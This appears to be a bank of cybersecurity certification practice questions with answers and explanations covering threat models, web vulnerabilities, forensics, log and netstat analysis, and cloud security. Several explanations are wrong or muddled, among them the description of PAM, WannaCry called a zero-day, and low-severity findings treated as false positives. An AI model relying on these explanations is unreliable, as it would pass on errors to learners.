In the Mirai botnet attack, thousands of IoT devices, such as cameras and routers, were infected and used to launch large-scale DDoS attacks. In the Diamond Model of Intrusion Analysis, what do these IoT devices represent? Infrastructure Victim Adversary Capability
Infrastructure In the Diamond Model of Intrusion Analysis, the infected IoT devices used in the Mirai botnet attack represent the Infrastructure. Capability refers to the tools and techniques used in the attack, not the resources used in the attack. The Adversary is the entity conducting the attack, not the resources used in the attack. The Victim is the target of the attack, not the resources used in the attack.
Schuyler, a cybersecurity analyst is considering purchasing a service which will provide a Virtual Private Cloud to host her company's website. Which of the following service model is Schuyler looking at purchasing for her company? Function as a Service Infrastructure as a Service Software as a Service Platform as a Service
Infrastructure as a Service Infrastructure as a Service (IaaS) is a computing method that uses the cloud to provide any or all infrastructure needs. In a VPC environment, an organization may provision virtual servers in a cloud-hosted network. The service consumer is still responsible for maintaining the IP address space and routing internally to the cloud. Platform as a Service (PaaS) is a computing method that uses the cloud to provide any platform-type services. Software as a Service (SaaS) is a computing method that uses the cloud to provide users with application services. Function as a Service (FaaS) is a cloud service model that supports serverless software architecture by provisioning runtime containers to execute code in a particular programming language.
What does a Cross-Site Scripting (XSS) vulnerability allow an attacker to do? Inject malicious scripts into web pages viewed by other users Modify the content of a website Bypass authentication controls Decrypt encrypted data
Inject malicious scripts into web pages viewed by other users XSS vulnerabilities allow attackers to inject malicious scripts into web pages that other users of the site will view, leading to potential data theft or other malicious actions. XSS does not allow an attacker to modify the actual content of the website, but rather the content as viewed by a specific user, and only for the duration of that user's session. While serious, XSS vulnerabilities do not directly involve bypassing authentication controls. This would be more associated with authentication or session management vulnerabilities. XSS vulnerabilities do not involve decrypting encrypted data. Decryption without the proper key would generally require a cryptographic attack.
Yoyodyne Systems has recently bought out its competitor, Whamiedyne Systems, which went out of business due to a series of data breaches. As a cybersecurity analyst for Yoyodyne, you are assessing Whamiedyne's existing applications and infrastructure. During your analysis, you discover the following URL is used to access an application:-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-https://www.whamiedyne.com/app/accountInfo?acct=12345-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-You change the URL to end with 12346 and notice that a different user's account information is now displayed.Which of the following type of vulnerabilities or threats have you discovered? Insecure direct object reference Race condition SQL injection XML injection
Insecure direct object reference This is an example of an insecure direct object reference. Direct object references are typically insecure when they do not verify whether a user is authorized to access a specific object. Therefore, it is important to implement access control techniques in applications that work with private information or other sensitive data types. Based on the URL above, you cannot determine if the application is vulnerable to an XML or SQL injection attack. An attacker can modify one or more of these four basic functions in a SQL injection attack by adding code to some input within the web app, causing it to execute the attacker's own set of queries using SQL. An XML injection is similar but focuses on XML code instead of SQL queries. A race condition is a software vulnerability when the resulting outcome from execution processes is directly dependent on the order and timing of certain events. Those events fail to execute in the developer's order and timing, which is not the case in this scenario.
What containment technique is the strongest possible response to an incident? Segmentation Isolating affected systems Isolating the attacker Enumeration
Isolating affected systems Isolation involves removing an affected component from whatever larger environment it is a part of. This can be everything from removing a server from the network after it has been the target of a DoS attack, placing an application in a sandbox virtual machine (VM) outside of the host environments it usually runs on. Segmentation-based containment is a means of achieving the isolation of a host or group of hosts using network technologies and architecture. Segmentation uses VLANs, routing/subnets, and firewall ACLs to prevent a host or group of hosts from communicating outside the protected segment. Removal is not an industry term used but would be a synonym for isolation. Enumeration is defined as the process of extracting user names, machine names, network resources, shares, and services from a system. Isolating the attacker would only stop their direct two-way communication and control of the affected system. However, it would not be the strongest possible response since there could be malicious code still running on your victimized machine.
A cybersecurity analyst just finished conducting an initial vulnerability scan and is reviewing their results. To avoid wasting time on results that are not really a vulnerability, the analyst wants to remove any false positives before remediating the findings. Which of the following is an indicator that something in their results would be a false positive? An HTTPS entry that indicates the web page is securely encrypted A scan result showing a version that is different from the automated asset inventory A finding that shows the scanner compliance plug-ins are not up-to-date Items classified by the system as Low or as For Informational Purposes Only
Items classified by the system as Low or as For Informational Purposes Only When conducting a vulnerability scan, it is common for the report to include some findings that are classified as "low" priority or "for informational purposes only." These are most likely false positives and can be ignored by the analyst when starting their remediation efforts. An HTTPS entry that indicates the web page is securely encrypted is not a false positive but a true negative (a non-issue). A scan result showing a different version from the automated asset inventory should be investigated and is likely a true positive. A finding that shows the scanner compliance plug-ins are not up-to-date would likely also be a true positive that should be investigated.
You are the first forensic analyst to arrive on the scene of a data breach. You have been asked to begin evidence collection on the server while waiting for the rest of your team to arrive. Which of the following evidence should you capture first? L3 cache ARP cache Backup tapes Image of the server's SSD
L3 cache When collecting evidence, you should always follow the order of volatility. This will allow you to collect the most volatile evidence (most likely to change) first and the least volatile (least likely to change) last. You should always begin collecting the CPU registers and cache memory (L1/L2/L3/GPU). The contents of system memory (RAM), including a routing table, ARP cache, process tables, kernel statistics, and temporary file systems/swap space/virtual memory. Next, you would move onto the collection of data storage devices like hard drives, SSDs, and flash memory devices. After that, you would move onto less volatile data such as backup tapes, external media devices (hard drives, DVDs, etc.), and even configuration data or network diagrams.
Your company is adopting a cloud-first architecture model. Management wants to decommission the on-premises SIEM your analysts use and migrate it to the cloud. Which of the following is an issue with using this approach? A VM escape exploit could allow an attacker to gain access to the SIEM The company will have less control over the SIEM Legal and regulatory issues may prevent data migration to the cloud The company will be dependent on the cloud provider's backup capabilities
Legal and regulatory issues may prevent data migration to the cloud If there are legal or regulatory requirements that require the company to host their security audit data on-premises, then moving to the cloud will not be possible without violating applicable laws. For example, some companies must host their data within their national borders, even if migrating to the cloud. The other options presented are all low risk and can be overcome with proper planning and mitigations. Most cloud providers have degrees of redundancy far above what any individual on-premises provider will be able to generate, making the concern over backups a minimal risk. If the SIEM is moved to a cloud-based server, it could still be operated and controlled in the same manner as the previous on-premise solution using a virtualized cloud-based server. While a VM or hypervisor escape is possible, they are rare and can be mitigated with additional controls.
Which analysis framework makes no allowance for an adversary retreat in its analysis? AlienVault (AT&T Cybersecurity) Cyber Kill Chain Lockheed Martin cyber kill chain MITRE ATT&CK framework Diamond Model of Intrusion Analysis
Lockheed Martin cyber kill chain The Lockheed Martin cyber kill chain implicitly assumes a unidirectional workflow. Therefore, it fails to consider that an adversary may retreat during an attack. MITRE and Diamond's models are more dynamic systems that allow for a broader range of adversary behaviors. AlienVault was specifically designed to avoid the rigidity of the Lockheed Martin cyber kill chain.
Which of the following terms refers to the action taken to minimize the impact of a vulnerability? Penetration Testing Mitigation Authentication Secure Coding
Mitigation Mitigation is a process that encompasses measures employed to lessen the impact or consequences of a given vulnerability. These actions could involve a variety of strategies, such as patching, which addresses the vulnerability directly by rectifying the underlying security flaw. Alternatively, mitigation could involve implementing additional security controls to decrease the likelihood of an attack. In some cases, complete removal of the system or service in question might be the best course of action. This eliminates the risk entirely, as the potential attack surface is no longer present. Consequently, mitigation represents a proactive approach to manage and reduce the potential impact of system vulnerabilities, thereby enhancing overall network security. Authentication is the process of verifying a user's identity, not reducing the impact of a vulnerability. Secure coding is a practice of writing programs in a way that prevents security vulnerabilities. Penetration testing involves simulating cyber attacks to evaluate the security of a system, not the actions taken to reduce vulnerability impact.
Your web application security team is preparing to conduct security testing on a new web application. Which guide would provide the most comprehensive framework for this testing? OWASP Testing Guide MITRE ATT&CK OSS TMM Cyber Kill Chain
OWASP Testing Guide The OWASP Testing Guide provides a comprehensive framework for web application security testing. While the Open Source Security Testing Methodology Manual (OSSTMM) does provide guidance for security testing, it is not specifically focused on web application security testing. The MITRE ATT&CK framework primarily serves as a knowledge base for understanding attacker behaviors and tactics, techniques, and procedures (TTPs), not for guiding web application security testing. The Cyber Kill Chain describes the stages of a cyberattack, not a framework for web application security testing.
What type of malware changes its binary pattern in its code on specific dates or times to avoid detection by antimalware software? Polymorphic virus Logic bomb Trojan Ransomware
Polymorphic virus A polymorphic virus alters its binary code to avoid detection by antimalware scanners that rely on signature-based detection. By changing its signature, the virus can avoid detection.
Consider the following snippet from a log file collected on the host with the IP address of 10.10.3.6. Time: Jun 12, 2020 09:24:12 Port:20 Destination:10.10.3.6 Protocol:TCP Time: Jun 12, 2020 09:24:18 Port:23 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP Time: Jun 12, 2020 09:24:20 Port:25 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP Time: Jun 12, 2020 09:24:22 Port:80 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP Time: Jun 12, 2020 09:24:24 Port:135 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP Time: Jun 12, 2020 09:24:26 Port:443 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP Time: Jun 12, 2020 09:24:26 Port:445 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP What type of activity occurred based on the output above? Denial of service attack targeting 10.10.3.6 Port scan targeting 10.10.3.2 Fragmentation attack targeting 10.10.3.6 Port scan targeting 10.10.3.6
Port scan targeting 10.10.3.6 Port Scanning is the name for the technique used to identify open ports and services available on a network host. Based on the logs, you can see a sequential scan of some commonly used ports (20, 21, 22, 23, 25, 80, 135, 443, 445) with a two-second pause between each attempt. The scan source is 10.10.3.2, and the destination of the scan is 10.10.3.6, making "Port scan targeting 10.10.3.6" the correct choice. IP fragmentation attacks are a common form of denial of service attack, in which the perpetrator overbears a network by exploiting datagram fragmentation mechanisms. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to a malicious cyber threat actor's actions.
A threat intelligence analyst is researching a new indicator of compromise. At the same time, the web proxy server-generated an alert for this same indicator of compromise. When asked about this alert, the analyst insists that they did not visit any of the related sites, but instead, they were listed on the results page of their search engine query. Which of the following is the BEST explanation for what has occurred? Prefetch is enabled on the analyst's web browser The standard approved browser was not being used by the analyst Alert is unrelated to the search that was conducted A link related to the indicator was accidentally clicked by the analyst
Prefetch is enabled on the analyst's web browser Prefetch, a capability in modern web browsers, is used to speed up web browsing by grabbing content that may be asked for by the user at a later time. For example, if you search for a term and the results are being shown to the user, prefetch will download the first three results in anticipation of the user clicking one of the top three links. In the scenario presented in this question, the prefetch has downloaded the malicious content and therefore caused the alert.
A penetration tester is using a known vulnerability to compromise an Apache webserver. After they gain access to the server, what is their next step to pivot to a protected system behind the DMZ? Privilege escalation Patching Vulnerability scanning Installing additional tools
Privilege escalation Apache web servers are run as a limited user by default, not as an administrative or root account. To be efficient and effective, the penetration tester should attempt to conduct a privilege escalation before pivoting into the DMZ. As a penetration tester, they would not likely patch the system, conduct a vulnerability scan, or install additional tools. This does not help them achieve their goal of pivoting into the DMZ.
Which tool should a malware analyst utilize to track the registry's changes and the file system while running a suspicious executable on a Windows system? DiskMon Autoruns Process Monitor ProcDump
Process Monitor Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, Registry, and process/thread activity. Autoruns shows you what programs are configured to run during system bootup or login. ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. DiskMon is an application that logs and displays all hard disk activity on a Windows system. This question may seem beyond the scope of the exam. Still, the objectives allow for "other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered" in the objectives' bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination's content. Therefore, questions like this are fair game on test day. That said, your goal isn't to score 100% on the exam; it is to pass it. Don't let questions like this throw you off on test day. If you aren't sure, take your best guess and move on!
What is the main purpose of the Open Source Security Testing Methodology Manual (OSSTMM)? Providing a structured approach to security testing Understanding the relationships between the elements of a cyber attack Providing a knowledge base of tactics, techniques, and procedures used by attackers Describing the linear progression of a cyber attack
Providing a structured approach to security testing The Open Source Security Testing Methodology Manual (OSSTMM) provides a structured approach to security testing across different areas such as applications, networks, and systems. This is a primary focus of the Diamond Model of Intrusion Analysis, not the OSSTMM. This is a primary purpose of the MITRE ATT&CK framework, not the OSSTMM. This is the main focus of the Cyber Kill Chain, not the OSSTMM.
A cybersecurity analyst reviews the logs of a proxy server and saw the following URL, https://www.google.com/search?q=*%40diontraining.com. Which of the following is true about the results of this search? Returns all web pages containing an email address affiliated with diontraining.com Returns no useful results for an attacker Returns all web pages hosted at diontraining.com Returns all web pages containing the text diontraining.com
Returns all web pages containing an email address affiliated with diontraining.com Google interprets this statement as <anything>@diontraining.com and understands that the user is searching for email addresses since %40 is the hex code for the @ symbol. The * is a wild card character meaning that any text could be substituted for the * in the query. This type of search would provide an attacker with a list of email addresses associated with diontraining.com, which could be used as part of a spear-phishing campaign. To return all web pages hosted at diontraining.com, you should use the "site:" modifier in the query. To return all web pages with the text diontraining.com, enter "diontraining.com" into the Google search bar with no modifiers to return those results.
In the aftermath of a ransomware attack at your company, you as the incident response manager have been asked to present a report to the executive team. They are particularly interested in a detailed analysis of how the attack happened and the key areas that allowed for it to occur. What part of your report should you focus on? Executive summary Scope Recommendations Root cause analysis
Root cause analysis A root cause analysis provides a deep dive into what allowed the incident to occur, helping to identify vulnerabilities and procedural shortcomings. The scope section typically outlines what systems and data were impacted by the incident, not the reasons behind it. While the recommendations section provides guidance on future action, it does not typically contain a detailed analysis of how the incident occurred. While the executive summary provides a high-level overview of the incident, it does not typically delve into a detailed analysis of the root causes.
After a cyber incident at your organization where a ransomware attack crippled the operational servers, your team is tasked with conducting an in-depth examination. The goal is to trace back the origin of the attack, determining where and how it penetrated your defenses. Which activity would best aid your team in this endeavor? Incident response plan Lessons learned Root cause analysis Forensic analysis
Root cause analysis Root cause analysis involves investigating an incident in detail to determine its origin and how it unfolded, with the aim of preventing similar incidents in the future. The incident response plan is a preparatory document outlining the organization's approach to managing security incidents. It is not an activity performed after an incident. Lessons learned is the review process after an incident, where stakeholders evaluate what happened, what was done well, and what needs improvement. It's a broader concept than just determining the initial cause of an issue. Although forensic analysis also involves a thorough investigation of an incident, its focus is broader and often includes legal implications, whereas root cause analysis is more focused on the initial causes of the issue.
You are analyzing a Linux server that you suspect has been tampered with by an attacker. You went to the terminal and typed 'history' into the prompt and saw the output: echo 127.0.0.1 diontraining.com etc hosts Which of the following best describes what actions were performed by this line of code? Attempted to overwrite the host file and deleted all data except this entry Added the website to system's whitelist in the hosts file Routed traffic destined for the localhost to the diontraining.com domain Routed traffic destined for the diontraining.com domain to the localhost
Routed traffic destined for the diontraining.com domain to the localhost Based on the output provided, it appears that the attacker has attempted to route all traffic destined for diontraining.com to the IP address specified (127.0.0.1). This is typically done to prevent a system from communicating with a specific domain to redirect a host to a malicious site. In this example, the IP domain name pair of 127.0.0.1 and diontraining.com is being written to the etc hosts file. Modifying your hosts file enables you to override the domain name system (DNS) for a domain on a specific machine. The command echo >> redirects the output of the content on the left of the >> to the end of the file on the right of the symbol. If the were used instead of , then this command would have overwritten the host file completely with this entry. The hosts file is not a system whitelist file.
The management at Steven's work is concerned about rogue devices being attached to the network. Which of the following solutions would quickly provide the most accurate information that Steve could use to identify rogue devices on a wired network? Router and switch-based MAC address reporting A discovery scan using a port scanner A physical survey Reviewing a central administration tool like a SCCM
Router and switch-based MAC address reporting The best option is MAC address reporting from a source device like a router or a switch. If the company uses a management system or inventory process to capture these addresses, then a report from one of these devices will show what is connected to the network even when they are not currently in the inventory. This information could then be used to track down rogue devices based on the physical port connected to a network device.
DeepScan supports data-flow analysis and understands the execution flow of a program. It allows you to see possible security flaws without executing the code. Which of the following types of tools would DeepScan be classified as? Fault injector Static code analyzer Decompiler Fuzzer
Static code analyzer DeepScan is an example of a static code analysis tool. It inspects the code for possible errors and issues without actually running the code. Fuzzing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program through a fuzzer. A decompiler is a computer program that takes an executable file as input and attempts to create a high-level source file that can be recompiled successfully. Fault injection is a testing technique that aids in understanding how a system behaves when stressed in unusual ways. A fuzzer, decompiler, and fault injector are all dynamic analysis tools because they require the program being tested and run for analysis.
A cybersecurity analyst is analyzing an employee's workstation that is acting abnormally. The analyst runs the netstat command and reviews the following output: TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING TCP 192.168.1.4:53 91.198.117.247:443 CLOSE_WAIT TCP 192.168.1.4:59515 208.50.77.89:80 ESTABLISHED TCP 192.168.1.4:59522 96.16.53.227:443 ESTABLISHED TCP 192.168.1.4:59523 96.16.53.227:443 ESTABLISHED TCP 192.168.1.4:53 208.71.44.30:80 ESTABLISHED TCP 192.168.1.4:59538 74.125.224.98:80 ESTABLISHED TCP 192.168.1.4:59539 74.125.224.98:80 ESTABLISHED Based on this output, which of the following entries is suspicious? (SELECT THREE) TCP 192.168.1.4:59518 69.171.227.67:443 ESTABLISHED TCP 0.0.0.0:53 0.0.0.0:0 LISTENING TCP 192.168.1.4:53 208.71.44.30:80 ESTABLISHED TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 192.168.1.4:53 91.198.117.247:443 CLOSE_WAIT TCP 192.168.1.4:59515 208.50.77.89:80 ESTABLISHED
TCP 0.0.0.0:53 0.0.0.0:0 LISTENING TCP 192.168.1.4:53 208.71.44.30:80 ESTABLISHED TCP 192.168.1.4:53 91.198.117.247:443 CLOSE_WAIT While we cannot be certain that any malicious activity is ongoing based solely on this netstat output, the three entries concerning port 53 are suspicious and should be further investigated. Port 53 is used for DNS servers to receive requests, and an employee's workstation running DNS would be unusual. If the Foreign Address using port 53, this would indicate the workstation was conducting a normal DNS lookup, but based on the network traffic direction, this is not the case. The entry that is listening on port 135 is not suspicious for a Windows workstation since this is used to conduct file sharing across a local Windows-based network with NetBIOS. The two entries from a random high number port to a web server (port 80 and port 443) is normal network traffic. The web server listens on a well-known or reserved port (port 80 and port 443) and then responds to the random high number port chosen by the workstation to conduct two-way communications.
William would like to use full-disk encryption on his laptop. He is worried about slow performance, though, so he has requested that the laptop have an onboard hardware-based cryptographic processor. Based on this requirement, what should William ensure the laptop contains? PAM TPM FDE AES
TPM This question is really asking if you know what each acronym means. Trusted Platform Module (TPM) is a hardware-based cryptographic processing component that is a part of the motherboard. A Pluggable Authentication Module (PAM) is a device that looks like a USB thumb drive and is used as a software key in cryptography. Full Disk Encryption (FDE) can be hardware or software-based. Therefore, it isn't the right answer. The Advanced Encryption System (AES) is a cryptographic algorithm. Therefore, it isn't a hardware solution.
Your organization has recently carried out a cloud security assessment using the Prowler tool and you are in charge of interpreting the results. You notice that several checks related to AWS Identity and Access Management (IAM) are flagged as FAIL. What does this likely indicate? There may be potential issues with the security configurations in the IAM services The Prowler tool is malfunctioning The AWS S3 services are misconfigured The cloud environment is completely secure
There may be potential issues with the security configurations in the IAM services Prowler is an AWS security best practices assessment, auditing, hardening, and forensics readiness tool. It checks the configuration of various AWS services and flags any potential security concerns. If Prowler flags IAM checks as FAIL, it likely indicates problems with IAM configurations such as overly permissive policies, unrotated keys, or unused IAM roles. While it's possible that any tool can malfunction, Prowler's output is generally reliable. A FAIL flag typically indicates an issue that needs to be addressed rather than a tool malfunction. Although Prowler does also check the configurations of AWS S3 services, a FAIL in the IAM checks specifically points to potential issues within IAM services. It does not directly suggest any issues with S3 configurations. The presence of multiple FAIL flags, especially in IAM related checks, suggests there are potential security issues that need to be addressed. It does not mean the cloud environment is completely secure.
In a network vulnerability assessment report, several zero-day and critical vulnerabilities were discovered. Why might this necessitate immediate action? Because they signal a need to decrease the frequency of vulnerability assessments These vulnerabilities present significant risk due to no current security fix being available Because they indicate a need to hire more staff Because zero-day and critical vulnerabilities improve the system's performance
These vulnerabilities present significant risk due to no current security fix being available Zero-day and critical vulnerabilities are high-risk issues that can severely compromise a system's security. One example of a zero-day virus that caused significant havoc is the "WannaCry" ransomware. It exploited a vulnerability in the Windows operating system, spreading rapidly across networks and encrypting files, demanding ransom payments in exchange for decryption. These types of vulnerabilities are significant threats, not performance enhancers. While additional resources might be needed for vulnerability management, the presence of critical vulnerabilities doesn't directly indicate staffing needs. On the contrary, critical vulnerabilities might suggest a need for more frequent and thorough assessments.
How do service level objectives (SLOs) contribute to incident response? They provide a detailed timeline of the incident They estimate the financial loss due to the incident They identify the root cause of the incident They define expectations for incident response times and quality, providing clear targets for the response team
They define expectations for incident response times and quality, providing clear targets for the response team SLOs set the expected standards for incident response, such as response times, thereby providing clear targets and performance benchmarks for the response team. SLOs set expectations for incident response performance; they are not designed to estimate financial loss from an incident. SLOs set performance standards and expectations; they do not directly contribute to identifying the root cause of an incident. While SLOs can guide the timeline of the response, they do not provide a detailed timeline of the incident.
A cybersecurity analyst at Yoyodyne Systems just finished reading a news article about their competitor, Whamiedyne Systems, being hacked by an unknown threat actor. Both companies sell to the same basic group of consumers over the internet since their products are used interchangeably by consumers. Which of the following is a valid cybersecurity concern for Yoyodyne Systems? The attacker will conduct a SQL injection against their database The same vulnerability will be compromised on their servers The attacker will conduct a man-in-the-middle attack They may now be vulnerable to a credential stuffing attack
They may now be vulnerable to a credential stuffing attack The largest and most immediate cybersecurity concern that the analyst should have is credential stuffing. Credential stuffing occurs when an attacker tests username and password combinations against multiple online sites. Since both companies share a common consumption group, it is likely that some of Yoyodyne's consumers also had a user account at Whamiedyne. If the attackers compromised the username and passwords from Whamiedyne's servers, they might attempt to use those credentials on Yoyodyne's servers, too. There is no definitive reason to believe that both companies are using the same infrastructure. Therefore, the same vulnerability that was exploited by the attacker may not exist at Yoyodyne. The question doesn't mention an SQL database. Therefore, there is no direct threat of an SQL injection. A man-in-the-middle (MitM) attack occurs when the attacker sits between two communicating hosts and transparently captures, monitors, and relays all communications between the host. Nothing in this question indicates that a MitM was utilized or is a possible threat.
Why is regular vulnerability management reporting critical to an organization's security posture? It's key to improving the company's stock performance It's essential for enhancing the company's brand image It's primarily important for increasing employee productivity To aid in effective prioritization and remediation
To aid in effective prioritization and remediation Regular reporting provides ongoing visibility into system vulnerabilities, aiding in effective prioritization and remediation strategies. While robust security can indirectly contribute to a company's overall performance, the immediate goal of vulnerability management reporting is to aid in maintaining a secure system. While strong security can enhance a company's reputation, the primary objective of vulnerability management reporting is to ensure effective security management. While productivity is a vital organizational goal, the primary aim of vulnerability management reporting is to maintain awareness of the system's security status.
Which technique would provide the largest increase in security on a network with ICS, SCADA, or IoT devices? User and entity behavior analytics Installation of anti-virus tools Use of a host-based IDS or IPS Implement endpoint protection platforms
User and entity behavior analytics Since ICS, SCADA, and IoT devices often run proprietary, inaccessible, or unpatchable operating systems, the traditional tools used to detect the presence of malicious cyber activity in normal enterprise networks will not function properly. Therefore, user and entity behavior analytics (UEBA) is best suited to detect and classify known-good behavior from these systems to create a baseline. Once a known-good baseline is established, deviations can be detected and analyzed. UEBA may be heavily dependent on advanced computing techniques like artificial intelligence and machine learning and may have a higher false-positive rate. As the name suggests, the analytics software tracks user account behavior across different devices and cloud services. Entity refers to machine accounts, such as client workstations or virtualized server instances, and embedded hardware, such as the Internet of Things (IoT) devices. Traditional technologies include anti-virus tools, host-based IDS and IPS, and endpoint protection platforms.
Which of the following techniques would best mitigate malware that utilizes a fast flux network for its command and control infrastructure? Conduct detailed statistical analysis of the structure of domain names to detect anomalies Blacklisting known malicious domain names Blacklisting known malicious IP addresses Utilize a secure recursive DNS resolver to a third-party secure DNS resolver
Utilize a secure recursive DNS resolver to a third-party secure DNS resolver Third-party DNS resolvers, particularly those of ISPs, will typically have elaborate algorithms designed to detect command and control (C2) via fast flux networks. Fast flux DNS utilizes a technique that rapidly changes the IP address associated with a domain to allow an adversary to defeat IP-based blacklists. Often, these fast flux networks have communication patterns that might be detectable, though. While in-house statistical analysis might be possible (and could be done in parallel), the commercial resources available to a large scale ISP or dedicated secure DNS providers will be better tailored to combatting this issue.
You need to determine the best way to test operating system patches in a lab environment before deploying them to your automated patch management system. Unfortunately, your network has several different operating systems in use, but you only have one machine available to test the patches on. What is the best environment to utilize to perform the testing of the patches before deployment? Sandboxing Virtualization Purchase additional workstations Bypass testing and deploy patches directly into the production environment
Virtualization When you have a limited amount of hardware resources to utilize but have a requirement to test multiple operating systems, you should set up a virtualized environment to test the patch across each operating system before deployment. You should never deploy patches directly into production without testing them first in the lab.
A cybersecurity analyst is preparing to run a vulnerability scan on a dedicated Apache server that will be moved into a DMZ. Which of the following vulnerability scans is most likely to provide valuable information to the analyst? Web application vulnerability scan Network vulnerability scan Port scan Database vulnerability scan
Web application vulnerability scan Since Apache is being run on the scanned server, this indicates a web server. Therefore, a web application vulnerability scan would be the most likely to provide valuable information. A network vulnerability scan or port scan can provide valuable information against any network-enabled server. Since an Apache server doesn't contain a database by default, running a database vulnerability scan is not likely to provide any valuable information to the analyst.
You have evidence to believe that an attacker was scanning your network from an IP address at 172.16.1.224. This network is part of a /26 subnet. You wish to quickly filter through several logs using a REGEX for anything that came from that subnet. What REGEX expression would provide the appropriate output when searching the logs for any traffic originating from only IP addresses within that subnet? \b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b \b172\.16\.1\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b \b172\.16\.1\.(25[0-5]|2[0-4][0-9]|19[2-9])\b \b172\.16\.1\.(25[0-5]|2[0-4][0-9]?)\b
\b172\.16\.1\.(25[0-5]|2[0-4][0-9]|19[2-9])\b The correct answer is \b172\.16\.1\.(25[0-5]|19[2-9]|2[0-4][0-9])\b. The \b delimiter indicates that we are looking for whole words for the complete string. To answer this question, you have to rely on your networking knowledge and what you learned back in Network+. First, you need to calculate what is the IP range for this subnet. Since this is a /26, it would have 64 IP addresses in the range. Since the IP provided was 172.16.1.224, the range would be 172.16.1.192 to 172.16.1.255. The correct answer allows all values of 200-249 through the use of the phrase 2[0-4][0-9]. The values of 250-255 are specified by 25[0-5]. The values of 192-199 are specified through the use of 19[2-9]. All other REGEX expressions either allow too much or too little of the available IP space to be effective and precise filters for the subnet given. If you had this on the exam, I would calculate the IP address range first (as we did in this explanation). Then, I would see which parts are static in the IP address (172.16.1. in this case). Three of our answer choices provide this, so we now know the large REGEX is the wrong answer. Next, we need to figure out how only to show the values of 192-255. As you look at the three options, you need to look for the differences only between the options and see which would allow for the addresses needed. All three options have the same two first terms in the last octet, which covers 200-255, so you really need to determine how to represent the values of 192-199 best.
What command should a forensic analyst use to make a forensic disk image of a hard drive? touch dd wget rm
dd The dd tool is used to make bit by bit copies of a disk, drive, or partition. Once the image is created using dd, a hash of the file should be made and placed into evidence to validate the integrity of the disk image that was created. This will ensure that no modification occurs between the collection and analysis of the disk image. The wget command is a command-line utility for downloading files from the Internet. The touch command is a standard command used in the UNIX/Linux operating system used to create, change, and modify timestamps of a file. The rm command is used to delete one or more files or directories.
Which of the following would be used to prevent a firmware downgrade? eFUSE TPM HSM SED
eFUSE eFUSE is an Intel-designed mechanism to allow software instructions to blow a transistor in the hardware chip. One use of this is to prevent firmware downgrades, implemented on some game consoles and smartphones. Each time the firmware is upgraded, the updater blows an eFUSE. When there is a firmware update, the updater checks that the number of blown eFUSEs is not less than the firmware version number. A self-encrypting drive (SED) uses cryptographic operations performed by the drive controller to encrypt a storage device's contents. A trusted platform module (TPM) is a specification for hardware-based storage of digital certificates, cryptographic keys, hashed passwords, and other user and platform identification information. The TPM is implemented either as part of the chipset or as an embedded function of the CPU. A hardware security module (HSM) is an appliance for generating and storing cryptographic keys. An HSM solution may be less susceptible to tampering and insider threats than software-based storage.
You are a cybersecurity analyst investigating a potential network issue at your company. You suspect there is unusual traffic on your company's network. Which of the following tools would be most effective for capturing and analyzing network packets in real-time to investigate this issue? Nmap Wireshark Ping tcpdump
tcpdump tcpdump is primarily used for capturing and analyzing network packets in real-time, which would be effective for investigating unusual network traffic. Nmap is primarily used for network discovery and security auditing. It can identify what hosts are available on the network, what services those hosts are offering, what operating systems they are running, and what type of packet filters/firewalls are in use. It doesn't focus on real-time packet analysis. While Wireshark is also a network protocol analyzer, it provides a GUI and more detailed analysis features than tcpdump. However, for quick, real-time traffic analysis, tcpdump is more lightweight and often preferred. Ping is a basic network tool used to test whether a particular host is reachable across an IP network and to measure the round-trip time for packets. It doesn't provide real-time traffic analysis.